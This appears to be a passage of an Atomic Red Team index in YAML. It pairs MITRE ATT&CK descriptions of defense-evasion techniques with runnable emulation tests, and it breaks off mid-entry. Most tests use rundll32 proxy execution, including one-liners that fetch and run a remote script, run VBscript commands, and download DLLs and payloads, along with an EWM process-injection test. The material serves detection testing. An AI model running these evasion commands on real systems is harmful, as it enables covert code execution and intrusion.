---
defense-evasion:
T1055.011:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298
created: '2020-01-14T17:18:32.126Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1055/011
external_id: T1055.011
- source_name: Microsoft Window Classes
description: Microsoft. (n.d.). About Window Classes. Retrieved December 16,
2017.
url: https://msdn.microsoft.com/library/windows/desktop/ms633574.aspx
- source_name: Microsoft GetWindowLong function
description: Microsoft. (n.d.). GetWindowLong function. Retrieved December
16, 2017.
url: https://msdn.microsoft.com/library/windows/desktop/ms633584.aspx
- source_name: Microsoft SetWindowLong function
description: Microsoft. (n.d.). SetWindowLong function. Retrieved December
16, 2017.
url: https://msdn.microsoft.com/library/windows/desktop/ms633591.aspx
- source_name: Elastic Process Injection July 2017
description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: MalwareTech Power Loader Aug 2013
description: MalwareTech. (2013, August 13). PowerLoader Injection – Something
truly amazing. Retrieved December 16, 2017.
url: https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html
- source_name: WeLiveSecurity Gapz and Redyms Mar 2013
description: Matrosov, A. (2013, March 19). Gapz and Redyms droppers based
on Power Loader code. Retrieved December 16, 2017.
url: https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/
- source_name: Microsoft SendNotifyMessage function
description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
16, 2017.
url: https://msdn.microsoft.com/library/windows/desktop/ms644953.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:19.059Z'
name: 'Process Injection: Extra Window Memory Injection'
description: "Adversaries may inject malicious code into process via Extra Window
Memory (EWM) in order to evade process-based defenses as well as possibly
elevate privileges. EWM injection is a method of executing arbitrary code
in the address space of a separate live process. \n\nBefore creating a window,
graphical Windows-based processes must prescribe to or register a windows
class, which stipulate appearance and behavior (via windows procedures, which
are functions that handle input/output of data).(Citation: Microsoft Window
Classes) Registration of new windows classes can include a request for up
to 40 bytes of EWM to be appended to the allocated memory of each instance
of that class. This EWM is intended to store data specific to that window
and has specific application programming interface (API) functions to set
and get its value. (Citation: Microsoft GetWindowLong function) (Citation:
Microsoft SetWindowLong function)\n\nAlthough small, the EWM is large enough
to store a 32-bit pointer and is often used to point to a windows procedure.
Malware may possibly utilize this memory location in part of an attack chain
that includes writing code to shared sections of the process’s memory, placing
a pointer to the code in EWM, then invoking execution by returning execution
control to the address in the process’s EWM.\n\nExecution granted through
EWM injection may allow access to both the target process's memory and possibly
elevated privileges. Writing payloads to shared sections also avoids the use
of highly monitored API calls such as WriteProcessMemory and
CreateRemoteThread.(Citation: Elastic Process Injection July
2017) More sophisticated malware samples may also potentially bypass protection
mechanisms such as data execution prevention (DEP) by triggering a combination
of windows procedures and other system functions that will rewrite the malicious
payload inside an executable portion of the target process. (Citation: MalwareTech
Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)\n\nRunning
code in the context of another process may allow access to the process's memory,
system/network resources, and possibly elevated privileges. Execution via
EWM injection may also evade detection from security products since the execution
is masked under a legitimate process. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
identifier: T1055.011
atomic_tests:
- name: Process Injection via Extra Window Memory (EWM) x64 executable
auto_generated_guid: 93ca40d2-336c-446d-bcef-87f14d438018
description: Hooks functions of main process to inject a payload via Extra Window
Memory (EWM) injection technique
supported_platforms:
- windows
input_arguments:
arch:
description: Architecture of payload. One of (x64, x86)
type: string
default: x64
exe_binary:
description: PE binary for EWM injection
type: path
default: PathToAtomicsFolder\T1055.011\bin\T1055.011_#{arch}.exe
payload_file:
description: raw payload to inject
type: path
default: PathToAtomicsFolder\T1055.011\bin\payload.exe_#{arch}.bin
dependency_executor_name: powershell
dependencies:
- description: 'T1055.011x64.exe and payload must exist on disk at specified
location (#{exe_binary} and #{payload_file})'
prereq_command: 'if (Test-Path #{exe_binary}) {exit 0} else {exit 1}'
get_prereq_command: |-
New-Item -Type Directory (split-path #{exe_binary}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.011/bin/T1055.011_#{arch}.exe" -OutFile "#{exe_binary}" -UseBasicParsing
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.011/bin/payload.exe_#{arch}.bin" -OutFile "#{payload_file}" -UseBasicParsing
executor:
command: "#{exe_binary}"
cleanup_command: Get-Process -Name Notepad -ErrorAction SilentlyContinue |
Stop-Process -Force
name: powershell
elevation_required: false
T1205.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520
created: '2022-09-30T21:18:41.930Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1205/002
external_id: T1205.002
- source_name: exatrack bpf filters passive backdoors
description: 'ExaTrack. (2022, May 11). Tricephalic Hellkeeper: a tale of
a passive backdoor. Retrieved October 18, 2022.'
url: https://exatrack.com/public/Tricephalic_Hellkeeper.pdf
- source_name: crowdstrike bpf socket filters
description: 'Jamie Harries. (2022, May 25). Hunting a Global Telecommunications
Threat: DecisiveArchitect and Its Custom Implant JustForFun. Retrieved October
18, 2022.'
url: https://www.crowdstrike.com/blog/how-to-hunt-for-decisivearchitect-and-justforfun-implant/
- source_name: Leonardo Turla Penquin May 2020
description: Leonardo. (2020, May 29). MALWARE TECHNICAL INSIGHT TURLA “Penquin_x64”.
Retrieved March 11, 2021.
url: https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf
- source_name: haking9 libpcap network sniffing
description: 'Luis Martin Garcia. (2008, February 1). Hakin9 Issue 2/2008
Vol 3 No.2 VoIP Abuse: Storming SIP Security. Retrieved October 18, 2022.'
url: http://recursos.aldabaknocking.com/libpcapHakin9LuisMartinGarcia.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:19.274Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
To establish a connection, an adversary sends a crafted packet to the targeted host that matches the installed filter criteria.(Citation: haking9 libpcap network sniffing) Adversaries have used these socket filters to trigger the installation of implants, conduct ping backs, and to invoke command shells. Communication with these socket filters may also be used in conjunction with [Protocol Tunneling](https://attack.mitre.org/techniques/T1572).(Citation: exatrack bpf filters passive backdoors)(Citation: Leonardo Turla Penquin May 2020)
Filters can be installed on any Unix-like platform with `libpcap` installed or on Windows hosts using `Winpcap`. Adversaries may use either `libpcap` with `pcap_setfilter` or the standard library function `setsockopt` with `SO_ATTACH_FILTER` options. Since the socket connection is not active until the packet is received, this behavior may be difficult to detect due to the lack of activity on a host, low CPU overhead, and limited visibility into raw socket usage.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: command-and-control
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Tim (Wadhwa-)Brown
- CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.0'
atomic_tests: []
T1027.011:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939
created: '2023-03-23T19:55:25.546Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1027/011
external_id: T1027.011
- source_name: Aquasec Muhstik Malware 2024
description: " Nitzan Yaakov. (2024, June 4). Muhstik Malware Targets Message
Queuing Services Applications. Retrieved September 24, 2024."
url: https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/
- source_name: Bitsight 7777 Botnet
description: Batista, João. Gi7w0rm. (2024, August 27). Retrieved June 5,
2025.
url: https://www.bitsight.com/blog/7777-botnet-insights-multi-target-botnet
- source_name: CISCO Nexus 900 Config
description: CISCO. (2021, September 14). Cisco Nexus 9000 Series NX-OS Fundamentals
Configuration Guide, Release 7.x. Retrieved June 5, 2025.
url: https://www.cisco.com/c/en/us/td/docs/switches/datacenter/nexus9000/sw/7-x/fundamentals/configuration/guide/b_Cisco_Nexus_9000_Series_NX-OS_Fundamentals_Configuration_Guide_7x/b_Cisco_Nexus_9000_Series_NX-OS_Fundamentals_Configuration_Guide_7x_chapter_01000.html
- source_name: Elastic Binary Executed from Shared Memory Directory
description: Elastic. (n.d.). Binary Executed from Shared Memory Directory.
Retrieved September 24, 2024.
url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-3-binary-executed-from-shared-memory-directory.html
- source_name: SecureList Fileless
description: Legezo, D. (2022, May 4). A new secret stash for “fileless” malware.
Retrieved March 23, 2023.
url: https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/
- source_name: Microsoft Fileless
description: Microsoft. (2023, February 6). Fileless threats. Retrieved March
23, 2023.
url: https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats
- source_name: Sysdig Fileless Malware 23022
description: Nicholas Lang. (2022, May 3). Fileless malware mitigation. Retrieved
September 24, 2024.
url: https://sysdig.com/blog/containers-read-only-fileless-malware/
- source_name: Akami Frog4Shell 2024
description: Ori David. (2024, February 1). Frog4Shell — FritzFrog Botnet
Adds One-Days to Its Arsenal. Retrieved September 24, 2024.
url: https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-06-05T15:30:20.139Z'
name: Fileless Storage
description: "Adversaries may store data in \"fileless\" formats to conceal
malicious activity from defenses. Fileless storage can be broadly defined
as any format other than a file. Common examples of non-volatile fileless
storage in Windows systems include the Windows Registry, event logs, or WMI
repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) Shared
memory directories on Linux systems (`/dev/shm`, `/run/shm`, `/var/run`, and
`/var/lock`) and volatile directories on Network Devices (`/tmp` and `/volatile`)
may also be considered fileless storage, as files written to these directories
are mapped directly to RAM and not stored on the disk.(Citation: Elastic Binary
Executed from Shared Memory Directory)(Citation: Akami Frog4Shell 2024)(Citation:
Aquasec Muhstik Malware 2024)(Citation: Bitsight 7777 Botnet)(Citation: CISCO
Nexus 900 Config).\n\nSimilar to fileless in-memory behaviors such as [Reflective
Code Loading](https://attack.mitre.org/techniques/T1620) and [Process Injection](https://attack.mitre.org/techniques/T1055),
fileless data storage may remain undetected by anti-virus and other endpoint
security tools that can only access specific file formats from disk storage.
Leveraging fileless storage may also allow adversaries to bypass the protections
offered by read-only file systems in Linux.(Citation: Sysdig Fileless Malware
23022)\n\nAdversaries may use fileless storage to conceal various types of
stored data, including payloads/shellcode (potentially being used as part
of [Persistence](https://attack.mitre.org/tactics/TA0003)) and collected data
not yet exfiltrated from the victim (e.g., [Local Data Staging](https://attack.mitre.org/techniques/T1074/001)).
Adversaries also often encrypt, encode, splice, or otherwise obfuscate this
fileless data when stored. \n\nSome forms of fileless storage activity may
indirectly create artifacts in the file system, but in central and otherwise
difficult to inspect formats such as the WMI (e.g., `%SystemRoot%\\System32\\Wbem\\Repository`)
or Registry (e.g., `%SystemRoot%\\System32\\Config`) physical files.(Citation:
Microsoft Fileless) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Christopher Peacock
- Denise Tan
- Mark Wee
- Simona David
- Xavier Rousseau
- Vito Alfano, Group-IB
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
x_mitre_version: '2.1'
atomic_tests: []
T1218.011:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5
created: '2020-01-23T18:03:46.248Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1218/011
external_id: T1218.011
- source_name: rundll32.exe defense evasion
description: Ariel silver. (2022, February 1). Defense Evasion Techniques.
Retrieved April 8, 2022.
url: https://www.cynet.com/attack-techniques-hands-on/defense-evasion-techniques/
- source_name: Attackify Rundll32.exe Obscurity
description: Attackify. (n.d.). Rundll32.exe Obscurity. Retrieved August 23,
2021.
url: https://www.attackify.com/blog/rundll32_execution_order/
- source_name: This is Security Command Line Confusion
description: B. Ancel. (2014, August 20). Poweliks – Command Line Confusion.
Retrieved March 5, 2018.
url: https://www.stormshield.com/news/poweliks-command-line-confusion/
- source_name: Github NoRunDll
description: gtworek. (2019, December 17). NoRunDll. Retrieved August 23,
2021.
url: https://github.com/gtworek/PSBits/tree/master/NoRunDll
- source_name: lolbas project Ieframe.dll
description: lolbas project. (n.d.). Ieframe.dll. Retrieved October 5, 2025.
url: https://lolbas-project.github.io/lolbas/Libraries/Ieframe/
- source_name: lolbas project Zipfldr.dll
description: lolbas project. (n.d.). Zipfldr.dll. Retrieved October 5, 2025.
url: https://lolbas-project.github.io/lolbas/Libraries/Zipfldr/
- source_name: Trend Micro CPL
description: Merces, F. (2014). CPL Malware Malicious Control Panel Items.
Retrieved November 1, 2017.
url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:20.567Z'
name: 'Signed Binary Proxy Execution: Rundll32'
description: "Adversaries may abuse rundll32.exe to proxy execution of malicious
code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)),
may avoid triggering security tools that may not monitor execution of the
rundll32.exe process because of allowlists or false positives from normal
operations. Rundll32.exe is commonly associated with executing DLL payloads
(ex: rundll32.exe {DLLname, DLLfunction}).\n\nRundll32.exe can
also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002)
Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL
and Control_RunDLLAsUser. Double-clicking a .cpl file also causes
rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002)
can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute
scripts such as JavaScript. This can be done using a syntax similar to this:
rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"
\ This behavior has been seen used by malware such as Poweliks.(Citation:
This is Security Command Line Confusion)\n\nThreat actors may also abuse legitimate,
signed system DLLs (e.g., zipfldr.dll, ieframe.dll) with rundll32.exe
to execute malicious programs or scripts indirectly, making their activity
appear more legitimate and evading detection.(Citation: lolbas project Zipfldr.dll)(Citation:
lolbas project Ieframe.dll)\n\nAdversaries may also attempt to obscure malicious
code from analysis by abusing the manner in which rundll32.exe loads DLL function
names. As part of Windows compatibility support for various character sets,
rundll32.exe will first check for wide/Unicode then ANSI character-supported
functions before loading the specified function (e.g., given the command rundll32.exe
ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to
execute ExampleFunctionW, or failing that ExampleFunctionA,
before loading ExampleFunction). Adversaries may therefore obscure
malicious code by creating multiple identical exported function names and
appending W and/or A to harmless ones.(Citation:
Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions
can also be exported and executed by an ordinal number (ex: rundll32.exe
file.dll,#1).\n\nAdditionally, adversaries may use [Masquerading](https://attack.mitre.org/techniques/T1036)
techniques (such as changing DLL file names, file extensions, or function
names) to further conceal execution of a malicious payload.(Citation: rundll32.exe
defense evasion) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.3.0
x_mitre_contributors:
- Gareth Phillips, Seek Ltd.
- Casey Smith
- Ricardo Dias
- James_inthe_box, Me
- Amir Hossein Vafifar
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '2.5'
identifier: T1218.011
atomic_tests:
- name: Rundll32 execute JavaScript Remote Payload With GetObject
auto_generated_guid: 57ba4ce9-ee7a-4f27-9928-3c70c489b59d
description: "Test execution of a remote script using rundll32.exe. Upon execution
notepad.exe will be opened. \nThis has been used by Win32/Poweliks malware
and works as described [here](https://www.stormshield.com/news/poweliks-command-line-confusion/)\n\nNote:
The GetObject function is no longer supported in Internet Explorer v9 (2011)
and later so this technique would only work where very old versions of IE
are installed. \n"
supported_platforms:
- windows
input_arguments:
file_url:
description: location of the payload
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct
executor:
command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();window.close();
'
cleanup_command: 'taskkill /IM notepad.exe /f
'
name: command_prompt
- name: Rundll32 execute VBscript command
auto_generated_guid: 638730e7-7aed-43dc-bf8c-8117f805f5bb
description: |
Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test.
Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/
Upon execution calc.exe will be launched
supported_platforms:
- windows
input_arguments:
command_to_execute:
description: Command for rundll32.exe to execute
type: string
default: calc.exe
executor:
command: 'rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)
'
name: command_prompt
- name: Rundll32 execute VBscript command using Ordinal number
auto_generated_guid: 32d1cf1b-cbc2-4c09-8d05-07ec5c83a821
description: |
Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test.
Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/
Upon execution calc.exe will be launched
supported_platforms:
- windows
input_arguments:
command_to_execute:
description: Command for rundll32.exe to execute
type: string
default: calc.exe
executor:
command: 'rundll32 vbscript:"\..\mshtml,#135 "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)
'
name: command_prompt
- name: Rundll32 advpack.dll Execution
auto_generated_guid: d91cae26-7fc1-457b-a854-34c8aad48c89
description: |
Test execution of a command using rundll32.exe with advpack.dll.
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Advpack.yml
Upon execution calc.exe will be launched
supported_platforms:
- windows
input_arguments:
inf_to_execute:
description: Local location of inf file
type: string
default: PathToAtomicsFolder\T1218.011\src\T1218.011.inf
dependency_executor_name: powershell
dependencies:
- description: 'Inf file must exist on disk at specified location ("#{inf_to_execute}")
'
prereq_command: 'if (Test-Path "#{inf_to_execute}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{inf_to_execute}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}"
executor:
command: 'rundll32.exe advpack.dll,LaunchINFSection "#{inf_to_execute}",DefaultInstall_SingleUser,1,
'
name: command_prompt
- name: Rundll32 ieadvpack.dll Execution
auto_generated_guid: 5e46a58e-cbf6-45ef-a289-ed7754603df9
description: |
Test execution of a command using rundll32.exe with ieadvpack.dll.
Upon execution calc.exe will be launched
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Ieadvpack.yml
supported_platforms:
- windows
input_arguments:
inf_to_execute:
description: Local location of inf file
type: string
default: PathToAtomicsFolder\T1218.011\src\T1218.011.inf
dependency_executor_name: powershell
dependencies:
- description: 'Inf file must exist on disk at specified location ("#{inf_to_execute}")
'
prereq_command: 'if (Test-Path "#{inf_to_execute}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{inf_to_execute}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}"
executor:
command: 'rundll32.exe ieadvpack.dll,LaunchINFSection "#{inf_to_execute}",DefaultInstall_SingleUser,1,
'
name: command_prompt
- name: Rundll32 syssetup.dll Execution
auto_generated_guid: 41fa324a-3946-401e-bbdd-d7991c628125
description: |
Test execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying "installation failed" will be opened
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Syssetup.yml
supported_platforms:
- windows
input_arguments:
inf_to_execute:
description: Local location of inf file
type: string
default: PathToAtomicsFolder\T1218.011\src\T1218.011_DefaultInstall.inf
dependency_executor_name: powershell
dependencies:
- description: 'Inf file must exist on disk at specified location ("#{inf_to_execute}")
'
prereq_command: 'if (Test-Path "#{inf_to_execute}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{inf_to_execute}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}"
executor:
command: 'rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall
128 "#{inf_to_execute}"
'
name: command_prompt
- name: Rundll32 setupapi.dll Execution
auto_generated_guid: 71d771cd-d6b3-4f34-bc76-a63d47a10b19
description: |
Test execution of a command using rundll32.exe with setupapi.dll. Upon execution, a windows saying "installation failed" will be opened
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Setupapi.yml
supported_platforms:
- windows
input_arguments:
inf_to_execute:
description: Local location of inf file
type: string
default: PathToAtomicsFolder\T1218.011\src\T1218.011_DefaultInstall.inf
dependency_executor_name: powershell
dependencies:
- description: 'Inf file must exist on disk at specified location ("#{inf_to_execute}")
'
prereq_command: 'if (Test-Path "#{inf_to_execute}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{inf_to_execute}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}"
executor:
command: 'rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128
"#{inf_to_execute}"
'
name: command_prompt
- name: Execution of HTA and VBS Files using Rundll32 and URL.dll
auto_generated_guid: 22cfde89-befe-4e15-9753-47306b37a6e3
description: |
IcedID uses this TTP as follows:
rundll32.exe url.dll,OpenURL %PUBLIC%\index.hta
Trickbot uses this TTP as follows:
rundll32.exe URL.dll,FileProtocolHandler C:\\..\\Detail\\akteullen.vbs
In this atomic, the sample hta file opens the calculator and the vbs file shows a message dialog with "rundll32 spawned wscript"
supported_platforms:
- windows
executor:
command: |
rundll32.exe url.dll,OpenURL "PathToAtomicsFolder\T1218.011\src\index.hta"
rundll32.exe URL.dll,FileProtocolHandler "PathToAtomicsFolder\T1218.011\src\akteullen.vbs"
name: command_prompt
- name: Launches an executable using Rundll32 and pcwutl.dll
auto_generated_guid: 9f5d081a-ee5a-42f9-a04e-b7bdc487e676
description: 'Executes the LaunchApplication function in pcwutl.dll to proxy
execution of an executable.
'
supported_platforms:
- windows
input_arguments:
exe_to_launch:
description: Path of the executable to launch
type: path
default: "%windir%\\System32\\notepad.exe"
executor:
command: 'rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch}
'
name: command_prompt
- name: Execution of non-dll using rundll32.exe
auto_generated_guid: ae3a8605-b26e-457c-b6b3-2702fd335bac
description: "Rundll32.exe running non-dll \n"
supported_platforms:
- windows
input_arguments:
input_url:
description: Url to download the DLL
type: url
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll
input_file:
description: Non-dll file
type: string
default: C:\Users\$env:username\Downloads\calc.png
dependency_executor_name: powershell
dependencies:
- description: 'Non-dll file must exist on disk at specified location
'
prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1}
'
get_prereq_command: 'Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
'
executor:
name: powershell
command: 'rundll32.exe #{input_file}, StartW
'
- name: Rundll32 with Ordinal Value
auto_generated_guid: 9fd5a74b-ba89-482a-8a3e-a5feaa3697b0
description: "Rundll32.exe loading dll using ordinal value #2 to DLLRegisterServer.
\nUpon successful execution, Calc.exe will spawn.\n"
supported_platforms:
- windows
input_arguments:
input_url:
description: Url to download the DLL
type: url
default: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/bin/AllTheThingsx64.dll
input_file:
description: DLL File
type: string
default: PathToAtomicsFolder\T1218.010\bin\AllTheThingsx64.dll
dependency_executor_name: powershell
dependencies:
- description: 'DLL file must exist on disk at specified location
'
prereq_command: 'if (Test-Path "#{input_file}") {exit 0} else {exit 1}
'
get_prereq_command: 'Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
'
executor:
name: command_prompt
command: 'rundll32.exe "#{input_file}",#2
'
- name: Rundll32 with Control_RunDLL
auto_generated_guid: e4c04b6f-c492-4782-82c7-3bf75eb8077e
description: "Rundll32.exe loading dll with 'control_rundll' within the command-line,
loading a .cpl or another file type related to CVE-2021-40444. \n"
supported_platforms:
- windows
input_arguments:
input_url:
description: Url to download the DLL
type: url
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll
input_file:
description: DLL File
type: string
default: PathToAtomicsFolder\T1047\bin\calc.dll
dependency_executor_name: powershell
dependencies:
- description: 'DLL file must exist on disk at specified location
'
prereq_command: 'if (Test-Path "#{input_file}") {exit 0} else {exit 1}
'
get_prereq_command: 'Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
'
executor:
name: command_prompt
command: 'rundll32.exe shell32.dll,Control_RunDLL "#{input_file}"
'
- name: Rundll32 with desk.cpl
auto_generated_guid: 83a95136-a496-423c-81d3-1c6750133917
description: "Rundll32.exe loading an executable renamed as .scr using desk.cpl
\nReference: \n - [LOLBAS - Libraries/Desk](https://lolbas-project.github.io/lolbas/Libraries/Desk/)\nSIGMA
rules:\n - [SCR File Write Event](https://github.com/SigmaHQ/sigma/blob/b53f08b081e0a50099be9b9e8eced82097fdbaf2/rules/windows/file_event/file_event_win_new_src_file.yml)\n
\ - [Rundll32 InstallScreenSaver Execution](https://github.com/SigmaHQ/sigma/blob/b53f08b081e0a50099be9b9e8eced82097fdbaf2/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml)\n"
supported_platforms:
- windows
input_arguments:
exe_to_launch:
description: Path of the executable to launch
type: path
default: "%windir%\\System32\\calc.exe"
executor:
name: command_prompt
command: |
copy #{exe_to_launch} not_an_scr.scr
rundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr
cleanup_command: del not_an_scr.scr
- name: Running DLL with .init extension and function
auto_generated_guid: 2d5029f0-ae20-446f-8811-e7511b58e8b6
description: |
This test, based on common Gamarue tradecraft, consists of a DLL file with a .init extension being run by rundll32.exe. When this DLL file's 'krnl' function is called, it launches a Windows pop-up.
DLL created with the AtomicTestHarnesses Portable Executable Builder script.
supported_platforms:
- windows
input_arguments:
dll_file:
description: The DLL file to be called
type: string
default: PathToAtomicsFolder\T1218.011\bin\_WT.init
dll_url:
description: The URL to the DLL file that must be downloaded
type: url
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/bin/_WT.init
dependency_executor_name: powershell
dependencies:
- description: The DLL file to be called must exist at the specified location
(#{dll_file})
prereq_command: if (Test-Path "#{dll_file}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path "#{dll_file}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "#{dll_url}" -OutFile "#{dll_file}"
executor:
command: 'rundll32.exe #{dll_file},krnl
'
name: command_prompt
- name: Rundll32 execute command via FileProtocolHandler
auto_generated_guid: f3ad3c5b-1db1-45c1-81bf-d3370ebab6c8
description: |
Test execution of a command using rundll32.exe and the FileProtocolHandler technique.
Upon execution, calc.exe will be launched.
